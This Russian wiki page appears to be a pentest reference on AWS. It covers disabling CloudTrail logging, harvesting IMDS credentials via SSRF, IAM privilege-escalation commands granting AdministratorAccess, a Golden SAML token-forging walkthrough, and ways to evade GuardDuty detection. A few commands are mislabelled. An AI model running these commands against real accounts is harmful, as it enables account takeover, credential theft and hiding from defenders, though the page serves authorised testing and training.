Отключить мониторинг на конкретные регионы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
</syntaxhighlight>

==== validate-logs ====

Проверить, были ли изменены логи.

aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]

=== Эксплуатация ===

==== Обход правила по UserAgent ====

На сервисе есть правило, по которому определяет, что запросы были сделаны с kali/parrot/pentoo используя awscli.

Для этого можно воспользоваться утилитой pacu, которая автоматически подменяет useragent. Использование утилиты в конце статьи.

== DynamoDB ==

Cистема управления базами данных класса NoSQL в формате «ключ — значение».

=== Роли - управление ===

==== dynamodb:ListTables ====

Позволяет посмотреть спрсок таблиц базы данных.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables

{
"TableNames": [
"users"
]
}
</syntaxhighlight>

==== dynamodb:Scan ====

Получение обьектов из базы данных:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]'

{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
}
</syntaxhighlight>

== ES (ElasticSearch) ==

ElasticSearch от AWS. Используется для просмотра логов/журналов, поиска на вебсайте и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.es.amazonaws.com
</syntaxhighlight>

== ELB (Elastic Load Balancing) ==

Балансировщик нагрузки.

Формат ссылки (elb_v1):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
</syntaxhighlight>

Формат ссылки (elb_v2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
</syntaxhighlight>

== RDS (Relational Database Service) ==

Облачная реляционная база данных (на выбор).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
</syntaxhighlight>

== Route 53 ==

Настраиваемая служба DNS.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
{user_provided}
</syntaxhighlight>

== API Gateway ==

API-сервис, который будет доступен почти со всех серверов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{restapi_id}.execute-api.{region}.amazonaws.com/{stage_name}/
https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}
</syntaxhighlight>

== CloudSearch ==

Альтернатива сервису ElasticSearch. Система для упрощения поиска для администрирования и, например, на вебсайте.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com
</syntaxhighlight>

== Transfer Family ==

Группа сервисов для передачи файлов (S3/EFS) по (SFTP, FTPS, FTP).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sftp://s-{random_id}.server.transfer.{region}.amazonaws.com
ftps://s-{random_id}.server.transfer.{region}.amazonaws.com
ftp://s-{random_id}.server.transfer.{region}.amazonaws.com
</syntaxhighlight>

== IoT (Internet Of Things) ==

Сервис для управления IoT-устройствами.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mqtt://{random_id}.iot.{region}.amazonaws.com:8883
https://{random_id}.iot.{region}.amazonaws.com:8443
https://{random_id}.iot.{region}.amazonaws.com:443
</syntaxhighlight>

== MQ ==

Сервис брокера сообщений для Apache ActiveMQ & RabbitMQ.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162
ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
</syntaxhighlight>

== MSK (Managed Streaming for Apache Kafka) ==

Сервис потоковой передачи данных в Apache Kafka.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
</syntaxhighlight>

== Cloud9 ==

Облачная интегрированная среда разработки(IDE) используя только браузер.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.vfs.cloud9.{region}.amazonaws.com
</syntaxhighlight>

== MediaStore ==

Cервис хранилища AWS, оптимизированный для мультимедийных материалов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.data.mediastore.{region}.amazonaws.com
</syntaxhighlight>

== Kinesis Video Streams ==

Обеспечивает простую и безопасную потоковую передачу видео с подключенных устройств в AWS для воспроизведения, аналитики, машинного обучения (ML) и других видов обработки.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.kinesisvideo.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaConvert ==

Сервис перекодирования видеофайлов с возможностями на уровне вещательных компаний. Он позволяет просто создавать контент в формате «видео по требованию» (VOD) для трансляций, в том числе мультиэкранных, в любом масштабе.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediaconvert.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaPackage ==

Cервис для подготовки и защиты видеоконтента, распространяемого через Интернет. AWS Elemental MediaPackage использует один источник видео и создает на его основе специализированные видеопотоки для воспроизведения на подключенных телевизорах, мобильных телефонах, компьютерах, планшетах и игровых консолях.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
</syntaxhighlight>

== ECR (Elastic Container Registry) ==

Региональный сервис, предназначенный для обеспечения гибкого развертывания образов.

=== Роли - управление ===

==== ecr:ListImages ====

Получить список образов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr list-images --repository-name <ECR_name> --registry-id <UserID> --region <region> --profile <profile_name>
</syntaxhighlight>

==== ecr:GetDownloadUrlForLayer ====

Позволяет получить URL на скачивание образа.

==== ecr:GetDownloadUrlForLayer + ecr:BatchGetImage + ecr:GetAuthorizationToken ====

Позволяет скачать образ (мб потребуется и ecr:ListImages чтобы получить список образов):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr get-login
docker pull <UserID>.dkr.ecr.us-east-1.amazonaws.com/<ECRName>:latest
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
</syntaxhighlight>

== Augmented AI (Amazon A2I) ==

https://aws.amazon.com/ru/augmented-ai/

== CodeGuru ==

https://aws.amazon.com/ru/codeguru/

== Comprehend ==

https://aws.amazon.com/ru/comprehend/

== DevOps Guru ==

https://aws.amazon.com/ru/devops-guru/

== Elastic Inference ==

https://aws.amazon.com/machine-learning/elastic-inference/

== Forecast ==

https://aws.amazon.com/ru/forecast/

== Fraud Detector ==

https://aws.amazon.com/ru/fraud-detector/

== HealthLake ==

https://aws.amazon.com/healthlake/

== Kendra ==

https://aws.amazon.com/kendra/?did=ap_card&trk=ap_card

== Lex ==

https://aws.amazon.com/lex/?did=ap_card&trk=ap_card

== Lookout for Equipment ==

https://aws.amazon.com/ru/lookout-for-equipment/

== Lookout for Metrics ==

https://aws.amazon.com/lookout-for-metrics/

== Lookout for Vision ==

https://aws.amazon.com/lookout-for-vision/

== Monitron ==

https://aws.amazon.com/monitron/

== Personalize ==

https://aws.amazon.com/personalize/

== Polly ==

https://aws.amazon.com/polly/

== Rekognition ==

https://aws.amazon.com/rekognition/

== SageMaker ==

https://aws.amazon.com/sagemaker/

== SageMaker Ground Truth ==

https://aws.amazon.com/sagemaker/groundtruth/

== Textract ==

https://aws.amazon.com/textract/

== Transcribe ==

https://aws.amazon.com/transcribe/

== Translate ==

https://aws.amazon.com/translate/

== Apache MXNet ==

https://aws.amazon.com/ru/mxnet/

== Deep Learning Containers ==

https://aws.amazon.com/machine-learning/containers/

== DeepComposer ==

https://aws.amazon.com/deepcomposer/

== DeepLens ==

https://aws.amazon.com/deeplens/

== DeepRacer ==

https://aws.amazon.com/deepracer/

== Inferentia ==

https://aws.amazon.com/machine-learning/inferentia/

== Panorama ==

https://aws.amazon.com/panorama/

== PyTorch ==

https://aws.amazon.com/pytorch/

== TensorFlow ==

https://aws.amazon.com/tensorflow/

== Deep Learning AMI ==

https://aws.amazon.com/machine-learning/amis/

= Утилиты =

== Вычисление ролей ==

=== enumerate-iam ===
github.com:andresriancho/enumerate-iam.git

== Эксплуатация ==

=== Golden SAML ===

Суть атаки в том, что зная ключ, которым подписываются SAML-запросы, вы можете подделать ответ и получить произвольные привилегии в SSO.

Подробнее про эксплуатацию тут: https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps

==== shimit ====
https://github.com/cyberark/shimit

Установка:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
cd /tmp
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
git clone https://github.com/cyberark/shimit
cd shmit
python shmit.py
</syntaxhighlight>

В начале потребуется доступ к AD FS аккаунту из персонального хранилища которого украсть приватный ключ ключ.
Сделать это можно используя mimikatz, но в примере сделано через библиотеку Microsoft.Adfs.Powershell и powershell

Пример эксплуатации:
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:auto" >
# Получаем приватный ключ
[System.Convert]::ToBase64String($cer.rawdata)
(Get-ADFSProperties).Identifier.AbsoluteUri
(Get-ADFSRelyingPartyTrust).IssuanceTransformRule

# Получаем инфу о юзерах - выбираем цель
aws iam list-users

# Получаем токен
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

# Проверяем текущий аккаунт
aws opsworks describe-my-user-profile
</syntaxhighlight>

== Проверки безопасности ==

Для администраторов преимущественно.

=== Zeus ===

https://github.com/DenizParlak/Zeus

== Другое ==

=== aws_consoler ===

https://github.com/NetSPI/aws_consoler

== All-In-One ==

=== pacu ===

https://github.com/RhinoSecurityLabs/pacu

=== ScoutSuite ===

https://github.com/nccgroup/ScoutSuite

=== cloudfox ===

https://github.com/BishopFox/cloudfox

= Ссылки =

== Статьи ==

[https://frichetten.com/blog/hijack-iam-roles-and-avoid-detection/ Hijacking IAM Roles and Avoiding Detection]

[https://frichetten.com/blog/bypass-guardduty-pentest-alerts/ Bypass GuardDuty PenTest Alerts]

[https://frichetten.com/blog/ssm-agent-tomfoolery/ Intercept SSM Agent Communications]

== Лаборатории ==

[https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 Damn Vulnerable Cloud Application]

[https://github.com/nccgroup/sadcloud SadCloud]

[http://flaws.cloud Flaws]

[http://flaws2.cloud/ Flaws]

[https://xakep.ru/2022/03/21/htb-stacked/ HackTheBox Stacked Writeup]

[https://github.com/RhinoSecurityLabs/cloudgoat CloudGoat]

[https://github.com/nccgroup/sadcloud SadCloud]

[https://www.wellarchitectedlabs.com/security/ AWS Well-Architected Labs]

[https://labs.withsecure.com/publications/attack-detection-fundamentals-2021-aws-lab-1 Attack Detection Fundamentals 2021: AWS - Lab #1]

[https://pentesting.cloud/ Free AWS Security Labs]

== Краткие заметки ==

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md PayloadAllTheThings]

[https://book.hacktricks.xyz/pentesting/pentesting-web/buckets/aws-s3 hacktricks-s3]

[https://book.hacktricks.xyz/cloud-security/aws-security hacktricks-aws]

[https://learntocloud.guide/#/phase5/README learntocloud(много ссылок)]

== Книги ==

[https://www.amazon.com/dp/1789136725/ Hands-On AWS Penetration Testing with Kali Linux]

Aws

2022-10-08T09:07:53Z

Drakylar: /* Лаборатории */

AWS - Amazon Web Service. Одна из первых облачных систем, состоящая из многих сервисов, которые при некорректной настройке оставляют дыры в безопасности.

= Организационные моменты =

При проведении тестирования на проникновение, требуется предупредить AWS (составить заявку).

Подробнее тут: https://aws.amazon.com/ru/security/penetration-testing/

= Общие концепции =

== Службы ==

Концепция служб в AWS позволяет автоматизировать многие процессы, включая саму разработку архитектуры.

Это экосистема многих сервисов. И AWS стремится увеличить их количество.

Например, связать сервис сбора логов и сервис по реагированию на инциденты, а результаты класть на сервис S3.

== Регионы ==

AWS разделен на регионы. Часть сервисов кросс-региональные, но большинство привязываются к конкретным регионам.

{| class="wikitable"
|+Регионы AWS
|-
| '''Название региона'''
| '''Endpoint(HTTPS)'''
|-
|us-east-2
|rds.us-east-2.amazonaws.com

rds-fips.us-east-2.api.aws

rds.us-east-2.api.aws

rds-fips.us-east-2.amazonaws.com
|-
|us-east-1
|rds.us-east-1.amazonaws.com

rds-fips.us-east-1.api.aws

rds-fips.us-east-1.amazonaws.com

rds.us-east-1.api.aws
|-
|us-west-1
|rds.us-west-1.amazonaws.com

rds.us-west-1.api.aws

rds-fips.us-west-1.amazonaws.com

rds-fips.us-west-1.api.aws
|-
|us-west-2
|rds.us-west-2.amazonaws.com

rds-fips.us-west-2.amazonaws.com

rds.us-west-2.api.aws

rds-fips.us-west-2.api.aws
|-
|af-south-1
|rds.af-south-1.amazonaws.com

rds.af-south-1.api.aws
|-
|ap-east-1
|rds.ap-east-1.amazonaws.com

rds.ap-east-1.api.aws
|-
|ap-southeast-3
|rds.ap-southeast-3.amazonaws.com
|-
|ap-south-1
|rds.ap-south-1.amazonaws.com

rds.ap-south-1.api.aws
|-
|ap-northeast-3
|rds.ap-northeast-3.amazonaws.com

rds.ap-northeast-3.api.aws
|-
|ap-northeast-2
|rds.ap-northeast-2.amazonaws.com

rds.ap-northeast-2.api.aws
|-
|ap-southeast-1
|rds.ap-southeast-1.amazonaws.com

rds.ap-southeast-1.api.aws
|-
|ap-southeast-2
|rds.ap-southeast-2.amazonaws.com

rds.ap-southeast-2.api.aws
|-
|ap-northeast-1
|rds.ap-northeast-1.amazonaws.com

rds.ap-northeast-1.api.aws
|-
|ca-central-1
|rds.ca-central-1.amazonaws.com

rds.ca-central-1.api.aws

rds-fips.ca-central-1.api.aws

rds-fips.ca-central-1.amazonaws.com
|-
|eu-central-1
|rds.eu-central-1.amazonaws.com

rds.eu-central-1.api.aws
|-
|eu-west-1
|rds.eu-west-1.amazonaws.com

rds.eu-west-1.api.aws
|-
|eu-west-2
|rds.eu-west-2.amazonaws.com

rds.eu-west-2.api.aws
|-
|eu-south-1
|rds.eu-south-1.amazonaws.com

rds.eu-south-1.api.aws
|-
|eu-west-3
|rds.eu-west-3.amazonaws.com

rds.eu-west-3.api.aws
|-
|eu-north-1
|rds.eu-north-1.amazonaws.com

rds.eu-north-1.api.aws
|-
|me-south-1
|rds.me-south-1.amazonaws.com

rds.me-south-1.api.aws
|-
|sa-east-1
|rds.sa-east-1.amazonaws.com

rds.sa-east-1.api.aws
|-
|us-gov-east-1
|rds.us-gov-east-1.amazonaws.com
|-
|us-gov-west-1
|rds.us-gov-west-1.amazonaws.com
|}

Или только регионы (могут пригодиться при переборе):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
us-east-2
us-east-1
us-west-1
us-west-2
af-south-1
ap-east-1
ap-southeast-3
ap-south-1
ap-northeast-3
ap-northeast-2
ap-southeast-1
ap-southeast-2
ap-northeast-1
ca-central-1
eu-central-1
eu-west-1
eu-west-2
eu-south-1
eu-west-3
eu-north-1
me-south-1
sa-east-1
us-gov-east-1
us-gov-west-1
</syntaxhighlight>

== Доступы ==

== Консольная утилита(awscli) ==

Чаще всего для взаимодействия с сервисами AWS вам потребуется консольная утилита awscli.

Утилита работает с настроенными профилями.

=== Файлы ===

==== ~/.aws/credentials ====

Файл с учетными данными профилей. Перефразирую: получив данные из этого файла вы, вероятнее всего, получите контроль над аккаунтами в нем.

У каждого профиля будет указан:

* Access Key ID - 20 случайных букв/цифр в верхнем регистре, часто начинается с "AKIA..."

* Access Key - 40 случайных символов различного регистра.

* Access Token - не всегда указывается

Полный список параметров можно посмотреть тут: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-files.html#cli-configure-files-settings

Пример содержимого файла (сохранен профиль default):

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token = AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvLXCrrrUtdnniCEXAMPLE/IvU1dYUg2RVAJBanLiHb4IgRmpRV3zrkuWJOgQs8IZZaIv2BXIa2R4Olgk
</syntaxhighlight>

==== ~/.aws/config ====

Файл с региональными настройками профиля(регион по-умолчанию).
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
region=us-west-2
output=json
</syntaxhighlight>

==== ~/.aws/cli/cache ====

Закешированные учетные данные

==== ~/.aws/sso/cache ====

Закешированные данные Single-Sign-On

=== Команды ===

Общее построение команды выглядит как:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws <название_сервиса> <действие> <дополнительные_аргументы>
</syntaxhighlight>

Примеры:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Вывести все S3-хранилища.
aws s3 ls

# Создание нового пользователя - сервис IAM
aws iam create-user --user-name aws-admin2
</syntaxhighlight>

== IMDS (Instance Metadata Service) ==

Это http API для запросов из EC2. Полезно если, например, у вас есть уязвимость SSRF в EC2.

Есть 2 версии:

*IMDSv1 - версия 1 по-умолчанию, не требует токен.

*IMDSv2 - версия 2, для запросов требуется токен.

Запрос без токена:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
curl http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Запрос с токеном:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Кроме доп. информации можно получить access-token для доступа в AWS с сервисного аккаунта ec2 (только для IMDSv2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# В начале делаем запрос на директорию /security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Потом выбираем нужный аккаунт и делаем запрос на него
http://169.254.169.254/latest/meta-data/iam/security-credentials/test-account
</syntaxhighlight>

Пример ответа:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Code" : "Success",
"LastUpdated" : "2019-12-03T07:15:34Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "xxxxxxxxxxxxxxxxxxx",
"SecretAccessKey" : "xxxxxxxxxxxxxxxxxxxxx",
"Token" : "xxxxxxxxxxxxxxxxxxxxx",
"Expiration" : "2019-12-03T13:50:22Z"
}
</syntaxhighlight>
После чего эти учетные данные можно использовать с awscli.

Другие полезные Endpoint'ы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://169.254.169.254/
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
</syntaxhighlight>

= Ролевая модель =

Почти все описание доступа идет через ролд. А роли в свою очередь состоят из двух типов политик:

* trust policy - определяет, чья будет роль

* permissions policy - определяет какой доступ будет у тех, у кого эта роль.

Каждая политика состоит из следующих компонентов:

* Ресурс - цель, кому выдается правило. Может быть:
** Пользователь
** Группа, в которой могут быть аккаунты по какому то признаку
** Другая политика.

* Роль(Action) - какое-либо действие (например, iam:ListGroupPolicies - посмотреть список груповых политик)

* Тип правила(Effect) - разрешение или запрет.

* Политика(Policy) - совокупность Роль(действие) -> разрешение/запрет -> Ресурс(кому).

* Условия(Condition) - отдельные условия, например, ip.

Пример политики:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Version": "2012-10-17", //Версия политики
"Statement": [
{
"Sid": "Stmt32894y234276923" //Опционально - уникальный идентификатор
"Effect": "Allow", //Разрешить или запретить
"Action": [ //Разрешенные/Запрещенные действия
"ec2:AttachVolume",
"ec2:DetachVolume"
],
"Resource": [ //На какие ресурсы можно/нельзя совершать действия
"arn:aws:ec2:*:*:volume/*",
"arn:aws:ec2:*:*:instance/*"
],
"Condition": { //Опционально - условия срабатывания
"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
}
}
]
}
</syntaxhighlight>

== Определение ролей ==

=== Вручную ===
TODO команды по определению своих ролей

=== Автоматизированно ===

== Эксплуатация ==

Когда вы определили, какие роли у вас есть, перейдите выше на соответствующий сервис, к которому идет данная роль и прочтите как ее эксплуатировать.

Тут будут отдельные роли, которые не прикреплены ни к одному сервису.

=== Административный доступ ===

Как выглядит роль с административным доступом:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": "*"
}
]
</syntaxhighlight>

= Службы =

== IAM ==

Сервис по обеспечению контроля доступа. Подробнее про ролевую модель можно почитать в соответствующей главе.

=== Роли - повышение привилегий ===

==== iam:UpdateLoginProfile ====

Сбросить пароль у других пользователей:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam update-login-profile --user-name target_user --password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:PassRole + ec2:RunInstance ====

См. EC2

==== iam:PassRole + glue:CreateDevEndpoint ====

См. Glue

=== Роли - повышение до админа ===

==== iam:AddUserToGroup ====

Добавить юзера в административную группу:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name <название_группы> --user-name <логин>
</syntaxhighlight>

==== iam:PutUserPolicy ====

Право добавить своб политику к ранее скомпрометированным обьектам.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam put-user-policy --user-name <логин> --policy-name my_inline_policy --policy-document file://path/to/administrator/policy.json
</syntaxhighlight>

==== iam:CreateLoginProfile ====

Привилегия для создания профиля(с паролем) для аккаунта, выставить новый пароль и перейти под этого пользователя.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam create-login-profile --user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:UpdateLoginProfile ====

Добавить существующую политику к любому пользователю.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachGroupPolicy ====

Добавить существующую политику к любой группе.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachRolePolicy ====

Добавить существующую политику к любой роли.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-role-policy --role-name role_i_can_assume --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:CreatePolicy ====

Создать административную политику.

==== iam:AddUserToGroup ====

Добавить пользователя в группу администраторов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name target_group --user-name my_username
</syntaxhighlight>

==== iam:CreatePolicyVersion + iam:SetDefaultPolicyVersion ====

Позволяет поменять политику, выставленную администраторами сети и применить ее, после чего повысить привилегии у обьекта.

Например, если у вас это право, то вы можете создать произвольную политику, дающую полный доступ и применить ее.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание политики
aws iam create-policy-version --policy-arn target_policy_arn --policy-document file://path/to/administrator/policy.json --set-as-default
# Установка политики по умолчанию.
aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2
</syntaxhighlight>

==== iam:PassRole + ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile ====

См. EC2

== AWS Shield ==

Сервис для защиты от DDoS.

== Cognito ==

Позволяет быстро и просто добавлять возможности регистрации, авторизации и контроля доступа пользователей в мобильные и интернет-приложения.

=== Основное ===

Cognito отвечает за следующие действия:

* Регистрация пользователя (email + пароль)

* Авторизация пользователя

* Работа с сохраненной пользовательской информацией (устанавливается приложением)

* Специальные действия (например, предоставление AWS-ключей)

Все общение идет по HTTP(s). Особенность системы в том, что Cognito общается как напрямую с чужим веб-сайтом, так и напрямую с клиентским браузером. То есть веб-сервер не знает, какой был передан пароль (в нормальной реализации).

Пример URL: cognito-identity.us-east-1.amazonaws.com

За действие отвечает HTTP-заголовок "X-Amz-Target". В своем роде, это Endpoints API.

Какие параметры требуются для работы с ним:

1. Название Endpoint'а - "X-Amz-Target" заголовок

2. Регион - "aws_project_region" параметр

3. Session token - позже требуется для запросов.

4. Identity Pool ID - нужен для запросов типа Identity Pools.

Также пишут, что Cognito разделяется на две основные части:

* User Pools - для тех, кому нужна только регистрация и аутентификация

* Identity Pools - для тех, кому еще и нужен доступ к AWS-ресурсам.

=== X-Amz-Target (Endpoints) ===

==== AWSCognitoIdentityService.UpdateUserAttributes ====

У каждого пользователя есть поля, которые могут быть установлены самим пользователем (например, фамилия или дата рождения). Но также это могут быть и критичные поля, такие, как ID пользователя, администратор ли он и так далее.

Также раньше можно было менять поле email'а пользователя (0day): https://infosecwriteups.com/hacking-aws-cognito-misconfiguration-to-zero-click-account-takeover-36a209a0bd8a

Важно! Указано, что могут быть отправки СМС-уведомлений, так что тестировать осторожно.

P.S. Мб неверно название Endpoint'а. Надо проверять.

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Позволяет получить AWS ключи для работы с AWS-консолью. По-умолчанию отключено.

Требуется aws_identity_pool_id.

В некоторых примерах оно также было указано как "com.amazonaws.cognito.identity.model.AWSCognitoIdentityService.GetCredentialsForIdentity"

Подробнее тут: https://blog.appsecco.com/exploiting-weak-configurations-in-amazon-cognito-in-aws-471ce761963

==== AWSCognitoIdentityService.GetOpenIdToken ====

Позволяет получить OpenID токен, действительный на 10 минут.

В примере требуется только "IdentityID"

==== AWSCognitoIdentityService.GetOpenIdTokenForDeveloperIdentity ====

Тоже позволяет получить OpenID токен, действительный на 10 минут. Но также создает новый "IdentityID" (если он не был указан).

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Получить учетные данные пользователя по IdentityID: SecretKey, SessionToken, AccessKeyID.

https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.html

== GuardDuty ==

Сервис для детектирования атак используя машинное обучение.

Для детекта использует следующие сервисы:

* CloudTrail
* VPC Flow Logs
* DNS Logs
* ...to be continued

=== Обход защиты ===

Далее идут правила детекта и то, как их можно обойти.

==== UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration ====

Детектит, если AWS-API команды были запущены за пределами EC2 (используя токен этого EC2).

Правило эффективно, если хакер хочет украть токен с EC2 и использовать его вне EC2 (например, если есть только SSRF).

Обход простой: создать свой EC2-инстанс и делать API-запросы с полученными учетными данными жертвы.
Тогда правило не сработает, даже если учетные данные не принадлежат данной EC2 тк правило проверяет source ip и является ли он EC2.

Может быть для этого выгодно держать проксирующий сервер EC2.

==== UserAgent rules ====

Суть в том, что GuardDuty будет добавлять Alert если AWS-CLI использует UserAgent например Kali.
Варианты:

* Использовать утилиту pacu (уже есть смена User-Agent)

